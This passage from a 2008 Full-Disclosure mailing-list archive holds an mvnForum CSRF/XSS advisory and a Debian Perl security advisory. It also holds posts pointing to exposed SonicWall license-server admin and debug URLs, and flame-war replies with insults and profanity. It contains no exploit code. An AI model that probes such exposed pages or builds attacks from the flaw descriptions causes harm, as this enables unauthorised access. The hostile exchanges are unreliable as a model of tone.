XSS Security Rating : Critical Impact : Privilege escalation Affected Software : mvnForum (version <= 1.2 GA) 2. Technical Description We have detected five vulnerabilities in different functions of mvnForum, four of which are CSRF (Cross-site request forgery) flaw and the other is an XSS (Cross-site scripting) flaw. More precisely, four CSRF vulnerabilities make way for hackers to escalate their privilege on such forum by tricking the administrator to perform some task without asking him/her for confirmation. Tasks relating to these four vulnerabilities are: - Creating a new forum where the hacker is the administrator. - Raise the privilege of an arbitrary account. - Give an arbitrary account the sub-forum administrator privilege. - Enable or disable an arbitrary account. The XSS vulnerability is in the "Who's online" function of the forum. If hackers successfully exploit this flaw, malicious code (JavaScript) will be executed whenever the administrator view information with this function. 3. Solution Rating these highly critical vulnerabilities, Bkis Center recommends that all units, organizations and individuals using mvnForum should immediately update their forums with the latest version of the application here: http://sourceforge.net/project/showfiles.php?group_id=65527&package_id=63007 4. Credit Thanks Dau Huy Ngoc for working with SVRT-Bkis ---------------------------------------------------------------- SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems. Bach Khoa Internetwork Security Center (BKIS) Hanoi University of Technology (Vietnam) Email : svrt at bkav.com.vn Website : www.bkav.com.vn WebBlog : http://security.bkis.vn Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg ---------------------------------------------------------------- . SVRT-Bkis From erik at fortytwo.nl Wed Dec 3 12:57:34 2008 From: erik at fortytwo.nl (Erik van Dam) Date: Wed, 03 Dec 2008 13:57:34 +0100 Subject: [Full-disclosure] ids / ips survey Message-ID: <4936823E.6060107@fortytwo.nl> Dear All, 3 college students are doing an research project on IDS/IPS systems. If we just could use a some of your time to complete the survey we would very much be pleased! The survey is about which IDS/IPS systems is used, output reviewed etc.etc. Thank you very much for your time. Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y Kind regards, Erik van Dam From michael.holstein at csuohio.edu Wed Dec 3 14:28:44 2008 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Wed, 03 Dec 2008 09:28:44 -0500 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected In-Reply-To: <689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com> References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> <49363289.2020508@gmail.com> <689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com> Message-ID: <4936979C.8050507@csuohio.edu> > https://licensemanager.sonicwall.com/newui/admin/admin.jsp > > thats hilarious - it MUST be a kind of honeypot :P > I think they threw up a new licensemanager server without reviewing the config .. it allows directory enumeration on a lot of pages (including the root). This one is interesting : https://licensemanager.sonicwall.com/js/ClientValidationMethods.js Seems remote debug is on as well : https://licensemanager.sonicwall.com/mf/fwregister_done.jsp Cheers, Michael Holstein CISSP GCIA Cleveland State University From ureleet at gmail.com Wed Dec 3 14:52:46 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 3 Dec 2008 09:52:46 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> Message-ID: <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> luky 4 us, u arent any of the 3. thats a load off of our minds. On Wed, Dec 3, 2008 at 3:43 AM, n3td3v wrote: > I don't write news articles and I copy and paste abstracts from them, > welcome to fair use. If I wanted to be a news journalist I wouldn't be > a security researcher and ethical hacker. > > http://en.wikipedia.org/wiki/Fair_use > From ureleet at gmail.com Wed Dec 3 14:55:04 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 3 Dec 2008 09:55:04 -0500 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> Message-ID: <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com> hes not a troll andrew. he brings up good points. u nd i are the only trolls here. i only troll u. you troll every1. On Wed, Dec 3, 2008 at 6:48 AM, n3td3v wrote: > Thank you for the self vaildation otherwise I wouldn't know you were > an alias/troll. > > On Wed, Dec 3, 2008 at 10:22 AM, Viktor Larionov > wrote: >> Viktor Larionov >> snr. system administrator >> R&D team >> Salva Kindlustuse AS >> Parnu mnt. 16 >> 10141 Tallinn >> ESTONIA >> tel: (+372) 683 0636, (+372) 680 0500 >> fax: (+372) 680 0501 >> gsm: (+372) 5668 6811 >> viktor.larionov at salva.ee > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Dec 3 14:55:49 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 3 Dec 2008 09:55:49 -0500 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <4936823E.6060107@fortytwo.nl> References: <4936823E.6060107@fortytwo.nl> Message-ID: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> yeah, nice try. lets all just go click on the link that u post in fd. ! On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: > Dear All, > > 3 college students are doing an research project on IDS/IPS systems. If > we just could use a some of your time to complete the survey we would > very much be pleased! > > The survey is about which IDS/IPS systems is used, output reviewed etc.etc. > > Thank you very much for your time. > > Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y > > > Kind regards, > Erik van Dam > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Dec 3 14:56:10 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 3 Dec 2008 09:56:10 -0500 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> Message-ID: <6158bb410812030656p1f3ba54ak72b45a9961bcb91a@mail.gmail.com> pot kettle black On Wed, Dec 3, 2008 at 3:34 AM, n3td3v wrote: > You're like a shite that won't flush away. > > On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: >> all speculation: >> >> no 1 knows 4 sure. >> >> http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss >> >> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ >> >> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm >> >> c how i did that n3td3v? i posted links, nd talked about the article >> w/out stealing ppls work. >> >> pay attention. >> >> >> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote: >>> 2008/12/2 Ureleet >>>> >>>> u arent getting it. >>>> >>>> it has nothing 2 do w/ backdoors. they r talking about actual >>>> backdoors in the code. so that anyone who knows the backdoor can >>>> acess any windows system regarless. they r saying that microsoft has >>>> coded backdoors into the system so that the govt can get into any >>>> system, patched or not. pay attention. >>> >>> I haven't seen anything that suggests that systems are/will be backdoored >>> here. The text of the statement said "remote searches" which in legal terms >>> could be anything from something as simple as browsing shared files >>> available through P2P to full remote system access. >>> >>> Do you have anything else that suggests Windows has backdoors present other >>> than this statement? >>> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From erik at fortytwo.nl Wed Dec 3 15:01:23 2008 From: erik at fortytwo.nl (Erik van Dam) Date: Wed, 03 Dec 2008 16:01:23 +0100 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> References: <4936823E.6060107@fortytwo.nl> <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> Message-ID: <49369F43.30703@fortytwo.nl> Ureleet wrote: > yeah, nice try. lets all just go click on the link that u post in fd. ! > > On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: >> Dear All, >> >> 3 college students are doing an research project on IDS/IPS systems. If >> we just could use a some of your time to complete the survey we would >> very much be pleased! >> >> The survey is about which IDS/IPS systems is used, output reviewed etc.etc. >> >> Thank you very much for your time. >> >> Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y >> >> >> Kind regards, >> Erik van Dam >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > It's an real survey, but thank you for your paranoism. -- Met vriendelijke groet, Erik van Dam From hhoffman at ip-solutions.net Wed Dec 3 15:12:52 2008 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Wed, 03 Dec 2008 10:12:52 -0500 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> References: <4936823E.6060107@fortytwo.nl> <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> Message-ID: <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> Or even more scary... that you would run a survey app on the same system that you do all of your monitoring from :-( On Wed, 2008-12-03 at 09:55 -0500, Ureleet wrote: > yeah, nice try. lets all just go click on the link that u post in fd. ! > > On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: > > Dear All, > > > > 3 college students are doing an research project on IDS/IPS systems. If > > we just could use a some of your time to complete the survey we would > > very much be pleased! > > > > The survey is about which IDS/IPS systems is used, output reviewed etc.etc. > > > > Thank you very much for your time. > > > > Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y > > > > > > Kind regards, > > Erik van Dam > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From j.sentiar at gmail.com Wed Dec 3 16:28:08 2008 From: j.sentiar at gmail.com (j-f sentier) Date: Wed, 3 Dec 2008 11:28:08 -0500 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> Message-ID: <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> If there's a peace of shit around here that should be flushed, it's only you n3tcr4p No one like you, get the fuck back on your kiddie mailing list/group. 2008/12/3 n3td3v > You're like a shite that won't flush away. > > On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: > > all speculation: > > > > no 1 knows 4 sure. > > > > http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss > > > > http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ > > > > http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm > > > > c how i did that n3td3v? i posted links, nd talked about the article > > w/out stealing ppls work. > > > > pay attention. > > > > > > On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight > wrote: > >> 2008/12/2 Ureleet > >>> > >>> u arent getting it. > >>> > >>> it has nothing 2 do w/ backdoors. they r talking about actual > >>> backdoors in the code. so that anyone who knows the backdoor can > >>> acess any windows system regarless. they r saying that microsoft has > >>> coded backdoors into the system so that the govt can get into any > >>> system, patched or not. pay attention. > >> > >> I haven't seen anything that suggests that systems are/will be > backdoored > >> here. The text of the statement said "remote searches" which in legal > terms > >> could be anything from something as simple as browsing shared files > >> available through P2P to full remote system access. > >> > >> Do you have anything else that suggests Windows has backdoors present > other > >> than this statement? > >> > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/a1a6c92c/attachment.html From white at debian.org Wed Dec 3 06:15:24 2008 From: white at debian.org (Steffen Joeris) Date: Wed, 03 Dec 2008 07:15:24 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1678-1] New perl packages fix privilege escalation Message-ID: <87vdu1lr7n.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1678-1 security at debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : perl Vulnerability : design flaws Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-5302 CVE-2008-5303 Debian Bug : 286905 286922 Paul Szabo rediscovered a vulnerability in the File::Path::rmtree function of Perl. It was possible to exploit a race condition to create setuid binaries in a directory tree or remove arbitrary files when a process is deleting this tree. This issue was originally known as CVE-2005-0448 and CVE-2004-0452, which were addressed by DSA-696-1 and DSA-620-1. Unfortunately, they were reintroduced later. For the stable distribution (etch), these problems have been fixed in version 5.8.8-7etch5. For the unstable distribution (sid), these problems have been fixed in version 5.10.0-18 and will migrate to the testing distribution (lenny) shortly. We recommend that you upgrade your perl packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5.dsc Size/MD5 checksum: 750 a57837967b7420057558cab7efca9202 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz Size/MD5 checksum: 12829188 b8c118d4360846829beb30b02a6b91a7 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5.diff.gz Size/MD5 checksum: 105052 cfd4c3d27c5a7a342c441383867dae89 Architecture independent packages: http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb Size/MD5 checksum: 41082 9dfa8758852aadcaadb2edbdfa17f942 http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch5_all.deb Size/MD5 checksum: 7378812 3baade38d4a703ae7db0e2f7d7b2df62 http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch5_all.deb Size/MD5 checksum: 2316518 dc45e7d6fbedf992db42f31326457df2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 4150162 345ac6cfebda2d2e6807a1dc0e14957c http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 1006 f010eb97c3f81b2958c7546ba69296eb http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 2928894 52f0aa7e688e63cd4d487a6492d9ee2e http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 36236 eb16c8490e1e164ef6444f4b7680fbc6 http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 821796 d48d9e6f1a07eafdc6acb6d990cf1fbc http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_alpha.deb Size/MD5 checksum: 880174 f32a7823fd919ada981b3eda1abe6a70 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 630776 4f134545671885f476770a9da3695301 http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 806610 02ed83b2872342eb732c0179daa52869 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 32774 4db9f5a96272f4a561abadbc3a1ed175 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 4248964 b09695271b26cb6b6245a791e9e7122d http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 2735132 c8bb2c571273b1ef47beb05874ae4277 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_amd64.deb Size/MD5 checksum: 1010 4223d65b463272ca026ee7e7d7d0ff02 arm architecture (ARM) http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_arm.deb Size/MD5 checksum: 1008 fd5146b7fceeb55c7ba16831e95f0b4a http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_arm.deb Size/MD5 checksum: 562112 24fe7aacf39d42673555f228e6edd5d7 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_arm.deb Size/MD5 checksum: 30338 57ce7264534de68fe870e72eaae6a186 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_arm.deb Size/MD5 checksum: 3410084 382ee29a48541e9270cb20926ff2c58a http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_arm.deb Size/MD5 checksum: 760136 6939901d705dbdac94e959ebab73d32a http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_arm.deb Size/MD5 checksum: 2548202 07796362a684d112be9dbea0ff5a2ab5 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_i386.deb Size/MD5 checksum: 3589118 bdcb99ed51d06b1639d98a661ce42d58 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb Size/MD5 checksum: 527162 c511226a2cbddb98a170c8f563d6670a http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb Size/MD5 checksum: 585396 f3f34d325de643667d4c12f897a15f48 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb Size/MD5 checksum: 32070 59d70d1ee4f0e7584230095ca079ceb7 http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb Size/MD5 checksum: 2491980 7149381d9862cc1ebd20092fae76dda9 http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_i386.deb Size/MD5 checksum: 762200 40254226d8ae5963a908661350816f0c ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 978092 e856d5880b7b4c26222a3e0a3e0e0610 http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 3364496 8248ac1db0819b45b0ea5bf2ba748f6f http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 1154060 3ff9faa1f05b380c486a86f79e7993a0 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 1008 ce21fdde9f6a971ab9bb950d5a4f8846 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 51272 85acec2cd9ad024ec30e00a5af6f5ccb http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_ia64.deb Size/MD5 checksum: 4336594 d4756a2b2de75f43cdb2f8ff4ccc0566 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_mips.deb Size/MD5 checksum: 2782132 4999312ae9a1844b4d475f34d312d334 http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_mips.deb Size/MD5 checksum: 694018 e974c764d6a3350e7425cf5990f02201 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_mips.deb Size/MD5 checksum: 3678988 94244c7432977a979063076fc67bbf29 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_mips.deb Size/MD5 checksum: 32216 cacc1e6e5d2649606ddccc99a9f09ebd http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_mips.deb Size/MD5 checksum: 786110 1713743185beb6ddc6de091ed4a7a0e5 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_mips.deb Size/MD5 checksum: 1008 905da3949be11e01942cb096f279cd63 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 653440 4ccf1e83f3159d64262c9d30506e151a http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 2710130 036b5620a814a6443d173a1a5f62a051 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 1012 3bf894f640eeb63b15a997dbb1e06a63 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 32908 bb7ccbed135a9625df993587576fbcf6 http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 811032 6ea8cf13343916db0f3e46c759f448da http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_powerpc.deb Size/MD5 checksum: 3824810 5864271ba481be6308ab9e704c2454c1 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_s390.deb Size/MD5 checksum: 823642 682e9f9fb581af9cc0aa9860c2747eba http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_s390.deb Size/MD5 checksum: 33108 311441a02f7965c21790d988b63879c6 http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_s390.deb Size/MD5 checksum: 2796658 3b4c21061de13bec62299cfda17c21a8 http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_s390.deb Size/MD5 checksum: 1008 201b45bdbf264748d665b789e501e2c9 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_s390.deb Size/MD5 checksum: 4100050 c2348e4c49820501d30e3736bb60e442 http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_s390.deb Size/MD5 checksum: 633612 6d818da26553af14a4479a23731ea8b0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 1014 bd9f92414f3d44f15efa2c8b25fd39d9 http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 3796714 95538b186d68bd25eec0dd3a27fe1447 http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 783702 e07757e74203c7c8eec5f2db41051bc4 http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 31056 d0ead72ea7bb47971f638ef7aee22705 http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 2565984 253cc0540fbaead2b39bbcf9dda3ab96 http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_sparc.deb Size/MD5 checksum: 594486 85b2168a8092deadace3044f51ebd20a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJNiNUAAoJEL97/wQC1SS+xTwH/0zeSjj1pMV/opCTwn43mJol fiGZ7O7Ng8o6Ps1fRuPZi+SdvaQxF3NbYWnyKikxY223AvLRlDQCPtbe0wZYf0bQ 6Cr9S+GaRTHd9UOg/4s2CE1clttlXRIzRQT9jTi/uycTr/JsAVUeWZ4LgrAq6P1l qxMxiZddeH6BRHJbFgMKT8nhnLkAOztAqSlmZjA4XBlq/LH4RyGhprJh39zuG2Aq U85a7vWzwwrH6EnfeYi4xS4i9kR5+YJUTvvgmdnYOfi6lOQl8Y3KG6Qeunmw/0gc GjB7KcH1bUyj8hiS0zoMCbFwwCsodt5zfoieD82VtvRGAv+PoaH4ZL4O8MfYS0o= =dFHH -----END PGP SIGNATURE----- From jmenerick at netsuite.com Wed Dec 3 18:13:29 2008 From: jmenerick at netsuite.com (Menerick, John) Date: Wed, 3 Dec 2008 10:13:29 -0800 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> References: <4936823E.6060107@fortytwo.nl> <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> Message-ID: <10CD0A2672F6814A988052F37D8D67554075F7F6@corpmail2007.corp.netledger.com> Scarier yet is that the system is from a part of the internet in IDS/IPS blacklist territory. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Harry Hoffman Sent: Wednesday, December 03, 2008 7:13 AM To: Ureleet Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] ids / ips survey Or even more scary... that you would run a survey app on the same system that you do all of your monitoring from :-( On Wed, 2008-12-03 at 09:55 -0500, Ureleet wrote: > yeah, nice try. lets all just go click on the link that u post in fd. ! > > On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: > > Dear All, > > > > 3 college students are doing an research project on IDS/IPS systems. If > > we just could use a some of your time to complete the survey we would > > very much be pleased! > > > > The survey is about which IDS/IPS systems is used, output reviewed etc.etc. > > > > Thank you very much for your time. > > > > Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y > > > > > > Kind regards, > > Erik van Dam > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ NOTICE: This email and any attachments may contain confidential and proprietary information of NetSuite Inc and is for the sole use of the intended recipient for the stated purpose. Any improper use or distribution is prohibited and subject to legal sanctions. If you are not the intended recipient, please notify the sender; do not review, copy or distribute; and promptly delete or destroy all transmitted information. From xploitable at gmail.com Wed Dec 3 21:46:13 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 21:46:13 +0000 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> Message-ID: <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> You'll never know and thats what bugs you. ;) On Wed, Dec 3, 2008 at 2:52 PM, Ureleet wrote: > luky 4 us, u arent any of the 3. > > thats a load off of our minds. > > On Wed, Dec 3, 2008 at 3:43 AM, n3td3v wrote: >> I don't write news articles and I copy and paste abstracts from them, >> welcome to fair use. If I wanted to be a news journalist I wouldn't be >> a security researcher and ethical hacker. >> >> http://en.wikipedia.org/wiki/Fair_use >> > From xploitable at gmail.com Wed Dec 3 22:03:46 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 22:03:46 +0000 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> Message-ID: 